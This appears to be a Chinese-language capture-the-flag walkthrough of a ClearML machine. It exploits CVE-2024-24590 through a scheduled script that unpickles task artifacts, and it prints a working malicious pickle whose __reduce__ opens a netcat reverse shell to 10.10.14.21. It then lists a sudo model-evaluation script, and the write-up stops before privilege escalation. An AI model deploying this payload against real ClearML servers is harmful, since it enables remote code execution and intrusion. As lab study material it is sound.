端口扫描

8

按照教程注册安装clear ml

加载configuration的时候会报错

将json里的API，File Store的host都添加到/etc/hosts中

即可成功初始化

查找clear ml漏洞
发现一个cve-2024-24590

下面是一个利用脚本，但不能直接用
ClearML-vulnerability-exploit-RCE-2024-CVE-2024-24590-/exploit.py at main · LordVileOnX/ClearML-vulnerability-exploit-RCE-2024-CVE-2024-24590- (github.com)

查看All Experiments
有一个Review JSON Artifacts脚本
观察可知这个脚本会定时循环运行

以下是脚本代码，关键地方都做了注释
总而言之就是该脚本会检查所有标记为"review"的项目名为"Black Swan"的任务
如果artifact是dict类型，就会将其反序列化

# !/usr/bin/python3

from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient

#打印出传入的字典data中的所有键值对
def process_json_artifact(data, artifact_name):
    """
    Process a JSON artifact represented as a Python dictionary.
    Print all key-value pairs contained in the dictionary.
    """
    print(f"[+] Artifact '{artifact_name}' Contents:")
    for key, value in data.items():
        print(f" - {key}: {value}")


#接收一个task
def process_task(task):
    artifacts = task.artifacts
    #遍历task的所有artifacts
    #if 是dict，调用process_json_artifact
    for artifact_name, artifact_object in artifacts.items():
        data = artifact_object.get()

        if isinstance(data, dict):
            process_json_artifact(data, artifact_name)
        else:
            print(f"[!] Artifact '{artifact_name}' content is not a dictionary.")


def main():
    #初始化ClearML任务
    review_task = Task.init(project_name="Black Swan",
                            task_name="Review JSON Artifacts",
                            task_type=Task.TaskTypes.data_processing)

    # Retrieve tasks tagged for review
    #检索所有标记为"review"的项目名为"Black Swan"的任务
    tasks = Task.get_tasks(project_name='Black Swan', tags=["review"], allow_archived=False)

    if not tasks:
        print("[!] No tasks up for review.")
        return

    threads = []
    # 如果有任务，脚本将为每个任务创建一个进程，调用process_task函数来处理任务中的工件
    for task in tasks:
        print(f"[+] Reviewing artifacts from task: {task.name} (ID: {task.id})")
        p = Process(target=process_task, args=(task,))
        p.start()
        threads.append(p)
        task.set_archived(True)

    for thread in threads:
        thread.join(60)
        if thread.is_alive():
            thread.terminate()

    # Mark the ClearML task as completed
    review_task.close()


def cleanup():
    client = APIClient()
    tasks = client.tasks.get_all(
        system_tags=["archived"],
        only_fields=["id"],
        order_by=["-last_update"],
        page_size=100,
        page=0,
    )

    # delete and cleanup tasks
    for task in tasks:
        # noinspection PyBroadException
        try:
            deleted_task = Task.get_task(task_id=task.id)
            deleted_task.delete(
                delete_artifacts_and_models=True,
                skip_models_used_by_other_tasks=True,
                raise_on_error=False
            )
        except Exception as ex:
            continue


if __name__ == "__main__":
    main()
    cleanup()

以下是反弹shell的payload

from clearml import Task
import pickle, os

class Common:

    def __reduce__(self):
            command = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.21 1234 >/tmp/f'
            return (os.system, (command,))


instance = Common()
#common = pickle.dumps(instance)
mydict = {'com_artifact': instance}

task = Task.init(project_name='Black Swan', task_name='cctask', tags=["review"])
task.upload_artifact(name='cc', artifact_object=mydict, retries=2, wait_on_upload=True, extension_name=".pkl")

成功反弹
sudo -l 发现有sudo权限

以下是脚本

#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"  

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"

fi

还没提权成功，不知道怎么利用
待续

=============================